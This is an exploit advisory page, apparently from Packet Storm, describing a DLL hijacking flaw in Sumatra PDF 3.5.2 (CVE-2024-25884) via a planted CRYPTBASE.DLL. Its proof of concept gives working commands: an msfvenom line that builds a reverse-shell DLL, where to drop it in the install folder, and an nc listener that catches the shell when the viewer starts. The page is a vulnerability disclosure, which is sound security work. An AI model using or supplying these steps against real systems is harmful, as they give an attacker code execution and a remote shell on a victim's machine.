SumatraPDF version 3.5.2 suffers from a DLL hijacking vulnerability using CRYPTBASE.DLL. DLL hijacking in this version was already discovered by Ravishanka Silva in February of 2024 but the findings did not include this DLL.
b54fc4aa8aa9cd1b68c0fee0e8f8f071f44a503ec283e0947fb0c29cce53475aSumatraPDF 3.5.2 DLL Hijack
# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack
# Date: 03.03.2024
# Exploit Author: Krishna Vamshi Katta Rokkaiah
# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader
# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer
# Version: 3.5.2
# Tested on: Windows 11
# CVE : CVE-2024-25884
Description:
In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.
Proof of Concept:
1. Use MSFVenom to create a malicious DLL:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL
2. Copy this file to the Sumatra PDF installation folder:
C:\Users\<username>\AppData\Local\SumatraPDF\
3. Start a listener in attacking system:
nc -nlvp 7777
4. Start the Sumatra PDF application and notice a reverse shell in the attacking system.
Demo:
https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed